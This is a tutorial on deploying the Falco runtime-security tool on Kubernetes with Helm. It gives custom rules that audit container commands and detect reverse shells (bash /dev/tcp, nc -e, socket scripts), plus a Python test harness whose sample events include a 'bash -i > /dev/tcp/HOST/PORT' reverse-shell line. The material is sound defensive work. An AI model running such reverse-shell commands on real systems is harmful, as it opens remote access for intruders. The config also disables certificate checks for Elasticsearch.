Falco installation and configuration
Falco is a CNCF project that audits what happens inside k8s containers, including commands and processes.
Deployment:
values.yaml contents (the two custom rules and the Falco/falcosidekick settings; the Slack webhook URL is a placeholder):
customRules:
  rulescustom.yaml: |-
    - macro: container
      condition: container.id != host
    - rule: "k8s容器命令审计"
      desc: Detect command executions in specific namespaces
      condition: evt.dir = "<" and evt.type = execve and container and (proc.name=echo or proc.name=wget or proc.name=curl or proc.name=python3 or proc.name=nmap or proc.name=telnet or proc.name=nc) and proc.tty != 0
      output: "风险提示: cmd=%proc.cmdline"
      priority: CRITICAL
      tags: [security, suspicious, command]
    - rule: "反向shell审计"
      desc: "Detect reverse shell patterns like bash -i > /dev/tcp, nc -e, etc."
      condition: evt.type = execve and evt.dir = < and container and ((proc.cmdline contains "/dev/tcp/" and proc.name in (bash, sh)) or (proc.name in (nc, ncat, socat) and proc.cmdline contains "-e") or (proc.name in (python, python3, perl) and proc.cmdline contains "socket"))
      output: "反向Shell,容器有可能主动向外连接提示 cmd=%proc.cmdline"
      priority: CRITICAL
      tags: [attack, reverse-shell]
tty: true
falco:
  http_output:
    enabled: true
  json_output: true
  rules_files:
    - /etc/falco/rules.d
falcosidekick:
  enabled: true
  config:
    elasticsearch:
      hostport: "https://eck-cluster-es-http.elastic-system.svc.cluster.local:9200"
      index: "falco"
      checkcert: false
    slack:
      webhookurl: "https://hooks.slack.com/services/xxx/xxxx/xxxxx"
      minimumpriority: "CRITICAL"
      outputformat: "fields"
      messageformat: ":rotating_light: k8s容器报警"
    k8s:
      node: false
      labels: false
falcoctl:
  artifact:
    install:
      enabled: false
    follow:
      enabled: false
json_include_output_property: true
Run:
helm install --namespace falco falco falcosecurity/falco -f values.yaml
Alternatively, pass the same settings directly with helm --set. The custom rules still have to live in values.yaml (they are a multi-line block, not something you can express with --set), so values.yaml is passed alongside the flags. Note that json_include_output_property is a field of the falco: block in the chart, alongside json_output (falco.json_include_output_property); the top-level key used here is not one the chart templates read.
helm upgrade --namespace falco falco falcosecurity/falco \
  --set tty=true \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.elasticsearch.hostport="https://eck-cluster-es-http.elastic-system.svc.cluster.local:9200" \
  --set falcosidekick.config.elasticsearch.index="falco" \
  --set falcosidekick.config.elasticsearch.checkcert=false \
  --set falco.http_output.enabled=true \
  --set falco.json_output=true \
  --set json_include_output_property=true \
  --set falcosidekick.config.slack.webhookurl=https://hooks.slack.com/services/xxxx/xxxx/xxxxxx \
  --set falcosidekick.config.slack.minimumpriority=CRITICAL \
  --set "falco.rules_files={/etc/falco/rules.d}" \
  --set falcoctl.artifact.install.enabled=false \
  --set falcoctl.artifact.follow.enabled=false \
  --set "falcosidekick.config.k8s.node=false" \
  --set "falcosidekick.config.k8s.labels=false" \
  --set falcosidekick.config.slack.outputformat="fields" \
  --set falcosidekick.config.slack.messageformat=":rotating_light: k8s容器报警" \
  -f values.yaml
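The two custom rules above are easy to misread (for example, the command-audit rule only fires when proc.tty != 0, so a curl run by a container entrypoint with no terminal never matches it, and both rules only look at the execve exit event). The script below is an added example, not part of the original post and not Falco's rule engine: it re-implements the two conditions in plain Python, runs them over constructed events (not captured from a real cluster; container ids and HOST/PORT are placeholders) and prints alerts in the shape Falco's json_output produces when json_include_output_property is on (rule, priority, output, output_fields). Use it to check which events you expect a rule to catch before shipping the rule into values.yaml.

```python
"""Simplified model of the two custom Falco rules in values.yaml.

Assumption: this re-implements the rule conditions in plain Python so they can be
exercised against constructed events. It is not Falco's engine: macros, lists and
field semantics beyond the handful of fields used by these two rules are ignored.
"""
from __future__ import annotations

import json
from dataclasses import dataclass

# proc.name values listed in the command-audit rule condition.
CMD_AUDIT_NAMES = {"echo", "wget", "curl", "python3", "nmap", "telnet", "nc"}


@dataclass
class Event:
    """Subset of Falco syscall-event fields used by the two rules."""
    evt_type: str        # e.g. "execve"
    evt_dir: str         # "<" = syscall exit, ">" = syscall entry
    container_id: str    # "host" when the process is not inside a container
    proc_name: str
    proc_cmdline: str
    proc_tty: int        # 0 when the process has no controlling terminal


def in_container(ev: Event) -> bool:
    """The 'container' macro: container.id != host."""
    return ev.container_id != "host"


def rule_command_audit(ev: Event) -> bool:
    """'k8s容器命令审计': interactive exec of a listed tool inside a container."""
    return (
        ev.evt_dir == "<"
        and ev.evt_type == "execve"
        and in_container(ev)
        and ev.proc_name in CMD_AUDIT_NAMES
        and ev.proc_tty != 0
    )


def rule_reverse_shell(ev: Event) -> bool:
    """'反向shell审计': the three cmdline patterns from the rule condition."""
    if not (ev.evt_type == "execve" and ev.evt_dir == "<" and in_container(ev)):
        return False
    bash_devtcp = "/dev/tcp/" in ev.proc_cmdline and ev.proc_name in ("bash", "sh")
    nc_exec = ev.proc_name in ("nc", "ncat", "socat") and "-e" in ev.proc_cmdline
    script_socket = ev.proc_name in ("python", "python3", "perl") and "socket" in ev.proc_cmdline
    return bash_devtcp or nc_exec or script_socket


# (rule name, condition, output format) mirroring the YAML rules.
RULES = [
    ("k8s容器命令审计", rule_command_audit, "风险提示: cmd={cmd}"),
    ("反向shell审计", rule_reverse_shell, "反向Shell,容器有可能主动向外连接提示 cmd={cmd}"),
]


def evaluate(ev: Event) -> list[dict]:
    """One alert dict per matching rule, shaped like a Falco json_output line."""
    alerts = []
    for name, cond, fmt in RULES:
        if cond(ev):
            alerts.append({
                "rule": name,
                "priority": "Critical",
                "output": fmt.format(cmd=ev.proc_cmdline),
                "output_fields": {"proc.cmdline": ev.proc_cmdline,
                                  "container.id": ev.container_id},
            })
    return alerts


# Constructed sample events (placeholder container id, HOST/PORT placeholders).
SAMPLE_EVENTS = [
    # Interactive curl inside a container: matches the command-audit rule.
    Event("execve", "<", "3f2a1c9d8e7b", "curl", "curl http://example.internal/", 1),
    # Same curl on the host (container.id == host): no rule fires.
    Event("execve", "<", "host", "curl", "curl http://example.internal/", 1),
    # curl from a container entrypoint with no tty: proc.tty != 0 is not satisfied.
    Event("execve", "<", "3f2a1c9d8e7b", "curl", "curl http://example.internal/healthz", 0),
    # bash with /dev/tcp/ in the cmdline and no tty: only the reverse-shell rule fires.
    Event("execve", "<", "3f2a1c9d8e7b", "bash", "bash -i > /dev/tcp/HOST/PORT", 0),
    # Syscall entry event (evt.dir = ">"): both rules require the exit event.
    Event("execve", ">", "3f2a1c9d8e7b", "bash", "bash -i > /dev/tcp/HOST/PORT", 0),
]


def matched_rule_names(events: list[Event]) -> list[list[str]]:
    """Names of the rules fired for each event, in input order."""
    return [[a["rule"] for a in evaluate(ev)] for ev in events]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for alert in evaluate(ev):
            print(json.dumps(alert, ensure_ascii=False))
```

The third sample is the one worth noticing: a tool from the audit list executed without a terminal produces no alert under the first rule as written, which is intended (it keeps legitimate entrypoints and probes quiet) but means non-interactive misuse of those tools is only caught if it also matches the reverse-shell patterns.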
